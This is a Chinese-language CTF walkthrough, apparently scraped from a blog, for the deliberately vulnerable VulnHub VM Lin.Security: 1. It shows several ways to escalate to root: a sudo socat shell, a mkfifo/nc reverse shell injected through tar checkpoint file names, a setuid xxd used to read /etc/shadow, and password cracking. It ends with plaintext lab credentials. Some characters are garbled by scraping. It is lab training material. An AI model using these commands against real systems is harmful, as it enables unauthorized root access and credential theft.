No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习

2023-10-25 14:50:34

**

VulnHub-Lin.Security: 1-Walkthrough

**

靶机地址:https://www.vulnhub.com/entry/linsecurity-1,244/
靶机难度:中级(CTF)
靶机发布日期:2018年7月11日
靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。
我们已将该框配置为模拟真实世界的漏洞(尽管位于单个主机上),这将帮助您完善本地特权升级技能,技术和工具集。从简单到中级都有许多挑战,我们很高兴看到您用来解决这些挑战的方法!
该图像不到1.7 GB,可以使用上面的链接下载。打开OVA文件时,将导入并使用NAT适配器配置名为lin.security的VM,但是可以通过首选虚拟化平台的首选项将其更改为桥接。
首先,您可以使用以下凭据登录主机:bob / secret
目标:得到root权限
作者:大余
时间:2020-01-20

请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

七种攻击方式

No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
这边直接给了低权限的用户密码…bob / secret,这边我还是习惯于kali登录他,进行渗透…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习IP:192.168.56.125
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
开了很多端口…还是从本地ssh上去登录吧…
看到介绍这个靶机应该是漏洞百出…供我们学习操作用的…
先拿个权限试试,看到没开80端口…估计是走linux类型的提权方式了…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
尝试在谷歌找这个版本的漏洞,都试了几个,目前没成功过…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
可以看到bob被授予访问权限以在可扩展程序上运行范围内容有很多…
这边https://gtfobins.github.io/参考这个学习github里面很多讲解sudo下的提权…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习

方法1:

如果sudo -l遇到socat,可以直接一条命令拿权限…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
命令:sudo socat tcp-listen:6666,reuseaddr,fork exec:sh,pty,stderr,setsid,sigint,sane
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
命令:soat FILE:tty,raw,echo=0 TCP:127.0.0.1:6666
提权成功…!!!
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
这也提权成功…!!
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
这也成功了!!!No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
还可以用git…提权
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
等等…只要sudo -l 中/user/bin/目录下的形式都有方法提权…参考:https://gtfobins.github.io/

方法2:

在现代Linux系统上,用户密码哈希存储在/etc/shadow中。如果我们查看/etc/passwd,通常会看到以下内容:
roroot❌0:0:root:/root:/bin/bash…
在这种情况下,x表示该用户的密码哈希存储在/etc/shadow中。但是,可以用此x替换/etc/passwd中的哈希,然后由主机对其进行评估…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
列如JTR或hash-identifier之类的工具将有助于将该哈希识别为descrypt,然后我们可以将其扔给JTR或hashcat进行破解看看…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习

方法3:

cron作业方法攻击,这里可以参考(链接
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
链接在上面()有…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
在攻击会话中执行…
命令:
echo “mkfifo /tmp/dayu; nc 127.0.0.1 6666 0</tmp/dayu | /bin/sh >/tmp/dayu 2>&1; rm /tmp/dayu” > shell.sh && chmod +x shell.sh
echo “” > “–checkpoint-action=exec=sh shell.sh”
echo “” > --checkpoint=1

No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
在有关Lin.security的另一个会话中,我们需要运行一个侦听器…成功提权

方法4:

利用隐藏文件…
有时最简单的漏洞隐藏在视线中…
找下…
用ls或者find找都可以…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
命令:ls -alR /home 或者…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
命令:find / -name “." -type f -path "/home/” -exec ls -al {} ; (此命令随意都可以套用)
使用secret进入了susan用户…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
提权需要密码…找下系统中有哪些文件
命令:ls -alt find / -perm -4000 -type f 2>/dev/null |grep -v snap
发现XXD文件…可以找到账号…参考
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
此命令将从我们传递的文件中读出一个十六进制转储,也可以用另一种方法将转储转换为原始文件,可以使用xxd读取任何文件,由于它是“ setuid”,因此我们可以使用root权限进行操作…

复制文件/etc/passwd和文件/etc/shadow,将使用archifamoso rockyou.txt作为单词列表从Kali中进行暴力破解…
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
No.24-VulnHub-Lin.Security: 1-Walkthrough渗透学习
root:secret123:0:0:root:/root:/bin/bash
bob㊙️1000:1004:bob:/home/bob:/bin/bash
insecurity:P@ssw0rd:0:0:

上一篇:浅谈面向对象思想


下一篇:osg 笔记一 (转)